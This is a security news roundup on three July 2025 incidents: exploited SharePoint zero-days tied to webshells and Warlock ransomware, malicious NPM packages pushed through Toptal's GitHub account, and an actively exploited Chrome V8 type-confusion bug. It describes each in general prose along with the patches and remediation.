Microsoft SharePoint Zero-Day Exploited: Cross-Industry Attacks and Escalating Ransomware Threats
In July 2025, newly discovered vulnerabilities in Microsoft SharePoint triggered a surge in targeted cyberattacks globally. Two distinct CVEs—one involving unauthenticated remote code execution and another allowing sophisticated network spoofing—were exploited by actors ranging from state-linked groups to ransomware operators. This campaign has compromised at least 75 organizations in finance, healthcare, government, and education, with technical attacks increasing in sophistication through new webshell variants and ransomware payloads.
Vulnerability Overview and Attack Vectors
The vulnerabilities, assigned CVE-2025-49706 (network spoofing) and CVE-2025-49704 (remote code execution), present a significant threat due to their ability to bypass authentication and escalate privileges over the network. Attackers chain the spoofing and RCE flaws to gain full administrative access to SharePoint environments, allowing them to:
- Directly interact with SharePoint file systems and databases
- Alter internal application configurations remotely
- Install persistent webshells, including .aspx, .exe, and .dll payloads
- Deploy additional malware or ransomware, including the latest “Warlock” strain
Tactics, Techniques, and Procedures (TTPs)
Newly observed technical behaviors include:
- Attackers use the “ToolShell” exploit chain, allowing unauthenticated code injection and authenticated access via spoofed sessions within corporate networks.
- Deployment of complex webshell backdoors and sideloaded .dll payloads, which evade traditional endpoint detection tools.
- Post-compromise deployment of ransomware—Warlock variants have begun encrypting files directly on SharePoint servers.
Affected Sectors and Real-World Impact
Organizations in banking, healthcare, higher education, and government have confirmed breaches, some resulting in prolonged operational outages and data exposure. Cybersecurity agencies report that espionage-linked and financially motivated threat actors share techniques and tools in exploiting these zero-days. Notably, the China-linked Storm-2603 group has used the flaws for global cyber-espionage and command-and-control infrastructure deployment.
Microsoft has released immediate mitigation guidelines and patches, while the U.S. Cybersecurity and Infrastructure Security Agency (CISA) flags these CVEs as critical, urging rapid patch deployment and heightened monitoring.
Major GitHub Supply Chain Attack: Compromise of Toptal Account and NPM Packages
In mid-July 2025, software development platform Toptal suffered a serious supply chain attack when threat actors breached the organization’s GitHub account and began publishing malicious NPM packages. The attackers masqueraded their payloads as legitimate open-source libraries, designed to hijack developer credentials and steal sensitive code via remote command execution. This incident has raised pressing industry-wide concerns around the security of code repositories and the vulnerability of the CI/CD pipeline ecosystem.
Technical Breakdown of the Attack
The attackers gained unauthorized access to the GitHub repository and pushed several NPM packages imitating trusted modules. Technical analysis indicates:
- Malicious scripts exfiltrated credentials and API tokens from developer environments upon installation.
- The packages included hidden modules capable of executing external commands, giving remote attackers a persistent foothold.
- Code obfuscation and module side-loading techniques hindered detection by automated repository defense systems.
Remediation and Industry Implications
Toptal swiftly removed the compromised code and began a thorough audit of its code and access permissions. The breach has prompted industry discussion over:
- The necessity for stringent multi-factor authentication and key control on code repositories
- The importance of active monitoring and anomaly detection within CI/CD and software supply chains
- New recommendations for automated scanning tools and manual review of third-party code included in production or public releases
Chrome’s V8 JavaScript Engine Zero-Day: Active Exploitation and Immediate Security Updates
Google responded to an active zero-day threat in Chrome’s V8 JavaScript engine (CVE-2025-6554) with the rapid release of a security fix. This vulnerability, exploited in the wild throughout early July, allowed adversaries to achieve remote code execution on victim systems merely by luring users to malicious webpages. The attack mechanism leverages a type confusion bug, exposing memory to arbitrary read/write operations and enabling browser sandbox escapes.
Technical Details and Exploit Mechanism
The flaw arises from improper handling of object types in Chrome’s V8 engine, permitting:
- JavaScript code to access out-of-bounds memory within the browser process
- The loading and execution of attacker-controlled scripts with elevated privileges
- Exfiltration of browser data, credential theft, and triggering of system-level exploits given a suitable chained vulnerability
Google addressed the vulnerability by applying a targeted fix and dispatching emergency updates to all Chrome Stable channel users. Patches are also being released to other browsers built on Chromium, such as Edge and Brave, to mitigate the same exposure.